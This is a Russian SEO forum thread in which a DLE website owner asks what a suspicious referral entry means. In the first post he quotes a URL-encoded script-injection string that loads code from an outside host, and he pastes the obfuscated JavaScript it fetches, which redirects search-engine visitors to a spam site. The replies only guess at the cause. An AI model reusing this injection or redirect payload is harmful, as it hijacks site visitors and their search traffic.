И снова DLE - SEO форум MaulTalk.com

И снова DLE, Взлом или что-то другое?

Опции

elvis81

Topic Starter сообщение

29.9.2011, 21:54; Ответить: elvis81

Сообщение #1

Познающий

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 223 раза
Репутация:

34

Доброго времени суток, уважаемые форумчане.

Поднимаю вопрос потому как сам вообще не разбираюсь в програмировании и хотел бы спросить у людей знающих.

У меня есть сайт, не так давно я так же как и все DLEшники боролся с взломом и закрывал дыры движка.
Но вот опять твориться что-то странное.
В модуле "переходы" появляется переход с гугла но с сылкой вот такого вида

_http://сайт/%3E%3C/a%3E%3Cscript%20src=http://vgoru.net/l.js%3E%3C/script%3E%3Ca%20href=

Я конечно же перешёл, для того чтобы посмотреть что там такое но переходил напрямую http://vgoru.net/l.js
И увидел там вот такой код:

if (dle_login_hash=="" || dle_admin==""){
function i( string ){var ret='',i = 0;for ( i = string.length-1;i>=0;i--){ret+=string.charAt(i);}return ret;}function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20document.location.href%3D%27http%3A//shara.all-lots-many.ru/%27+%27%3Fwkey%3D"+l(i('dce54'))+"%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));
}}

То что я там увидел мне не очень понравилось, хотя я и непонял что это такое.

Вопрос: Что же это такое? И как оно может повредить (если повредит)?

PS: Если тему уже поднимали, то не пинайте сильно, а просто укажите ссылк на тему. Если нет то пожалуйста поясните чем это чревато?

Да забыл сказать что переходы выполняются с IP адреса очень странного вида "74.125.77.147..."

Сообщение отредактировал elvis81 - 29.9.2011, 21:57

--------------------

ТИц поднимают, поднималкой для ТИца

2

Ответить с цитированием данного сообщения

taxi2008 taxi2008 29.9.2011, 22:01; Сообщений: 2048 Поблагодарили: 475 раз Репутация: 114 Просмотр профиля	29.9.2011, 22:01; Ответить: taxi2008 Сообщение #2
Старожил Группа: Active User Сообщений: 2048 Регистрация: 29.7.2008 Из: Нефтекамск Поблагодарили: 475 раз Репутация: 114	По поводу модуля - по ней очень часто задают вопросы подобного типа. Не только на данном форуме, но и на других. А вывод везде один - модуль нафиг ненужен. Уже 100 раз обсуждалось, что данный модуль дыревый до слез.. Тем не менее, многие игнорируют и ставят данный модуль, а потом идут на форум и жалуються что их взломали.. Советую бросить возиться с данным модулем.. Да и выглядит, лично по-моему мнению, просто отвратительно! -------------------- ХОСТИНГ, на котором держу свои сайты Своим рефералам предоставлю 3 месяца хостинга бесплатно!

elvis81 Topic Starter elvis81Topic Starter 29.9.2011, 22:05; Сообщений: 1240 Поблагодарили: 223 раза Репутация: 34 Просмотр профиля	Topic Starter 29.9.2011, 22:05; Ответить: elvis81 Сообщение #3
Познающий Группа: Active User Сообщений: 1240 Регистрация: 5.8.2008 Из: дом Поблагодарили: 223 раза Репутация: 34	Полагаю что каким то образом данный скрипт заставляет робота гугле посещать мой сайт с принудительно указанными параметрами. Разве такое возможно? Потому что IP адрес гугла. После удаления всех переходов, какое-то время такого не наблюдается, но позже обязательно это происходит снова. taxi2008, Вынужден с вами не согласиться. Модуль позволяет наблюдать за статистикой сайта. Я могу просто не выводить его на странице или просто убрать у модуля отображение страницы на которую попали сделав переход. Меня интересует чем опасны такие переходы. И неужели "недоброжелатели" смогли заставить спамить саму поисковую систему? Сообщение отредактировал elvis81 - 29.9.2011, 22:07 -------------------- ТИц поднимают, поднималкой для ТИца

Belos Belos 29.9.2011, 22:29; Сообщений: 2484 Поблагодарили: 714 раз Репутация: 96 Просмотр профиля	29.9.2011, 22:29; Ответить: Belos Сообщение #4
Старожил Группа: Active User Сообщений: 2484 Регистрация: 11.11.2008 Из: Украина Поблагодарили: 714 раз Репутация: 96	(elvis81 @ 29.9.2011, 21:05) Модуль позволяет наблюдать за статистикой сайта. Для мониторинга ест намного лучше сервисы, то же LI!!! По теме, соглашусь с taxi2008, модуль не нужный

elvis81 Topic Starter elvis81Topic Starter 29.9.2011, 22:35; Сообщений: 1240 Поблагодарили: 223 раза Репутация: 34 Просмотр профиля	Topic Starter 29.9.2011, 22:35; Ответить: elvis81 Сообщение #5
Познающий Группа: Active User Сообщений: 1240 Регистрация: 5.8.2008 Из: дом Поблагодарили: 223 раза Репутация: 34	Belos, Вы не по теме. И согласились с taxi2008 тоже не по теме. Тема совсем не касается нужно ставить модуль или нет. Тема касается анализа. Вы просто флудите. По теме нужно написать что вы думаете по коду приведённому выше. Не можете написать что-то существенное, не пишите ничего. -------------------- ТИц поднимают, поднималкой для ТИца

ФримаН ФримаН 29.9.2011, 23:44; Сообщений: 773 Поблагодарили: 109 раз Репутация: 44 Просмотр профиля	29.9.2011, 23:44; Ответить: ФримаН Сообщение #6
icq: 778367 Группа: Active User Сообщений: 773 Регистрация: 28.6.2010 Поблагодарили: 109 раз Репутация: 44	У меня были такие переходы. при чем не один и 10-20 в час. я не понимал нафига это надо пока не дошло что это роботы которые парсят твой контент. -------------------- Дизайн сайтов Порфолио Поблагодарили: (1) elvis81

lamov lamov 29.9.2011, 23:48; Сообщений: 270 Поблагодарили: 34 раза Репутация: 2 Просмотр профиля	29.9.2011, 23:48; Ответить: lamov Сообщение #7
Бывалый Группа: User Сообщений: 270 Регистрация: 6.7.2011 Из: Киев Поблагодарили: 34 раза Репутация: 2	Какая версия модуля? была такая проблема давно, когда перешел на более новую версию, а там была такая дырка, пришлось вернуться назад Поблагодарили: (1) elvis81

ФримаН ФримаН 29.9.2011, 23:54; Сообщений: 773 Поблагодарили: 109 раз Репутация: 44 Просмотр профиля	29.9.2011, 23:54; Ответить: ФримаН Сообщение #8
icq: 778367 Группа: Active User Сообщений: 773 Регистрация: 28.6.2010 Поблагодарили: 109 раз Репутация: 44	(lamov @ 29.9.2011, 22:48) Какая версия модуля? неважно. это не от модуля зависит это просто роботы воруют твои новости через дорогие грабберы. -------------------- Дизайн сайтов Порфолио

lamov lamov 30.9.2011, 1:53; Сообщений: 270 Поблагодарили: 34 раза Репутация: 2 Просмотр профиля	30.9.2011, 1:53; Ответить: lamov Сообщение #9
Бывалый Группа: User Сообщений: 270 Регистрация: 6.7.2011 Из: Киев Поблагодарили: 34 раза Репутация: 2	перейти вот тема была поднята по этому поводу Поблагодарили: (1) elvis81

ФримаН ФримаН 30.9.2011, 8:26; Сообщений: 773 Поблагодарили: 109 раз Репутация: 44 Просмотр профиля	30.9.2011, 8:26; Ответить: ФримаН Сообщение #10
icq: 778367 Группа: Active User Сообщений: 773 Регистрация: 28.6.2010 Поблагодарили: 109 раз Репутация: 44	(lamov @ 30.9.2011, 0:53) вот тема была поднята по этому поводу lamov, а ну да может и это а может и парсер) -------------------- Дизайн сайтов Порфолио

« Предыдущая тема · Программная часть · Следующая тема »

2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
DLE xProtect	2	xoopw	5977	15.1.2024, 21:06 автор: Diana_Wesley
Обновить сайт на CMS DLE	1	Sawich	1661	2.9.2023, 10:10 автор: WoWeb
Изготовление красивых сайтов на DLE под ключ \| Доступные цены от 2000 руб.	1	Admiral_ukr	1598	20.11.2022, 10:08 автор: Webmaster24
Ищу спеца по DLE вылечить сайт	4	Reactive	2638	22.10.2022, 9:01 автор: Fozik77
требуется перенос с Dle на wordpres нужен человек для переноса движка	5	Юрий82	1943	30.7.2022, 18:02 автор: Klerik84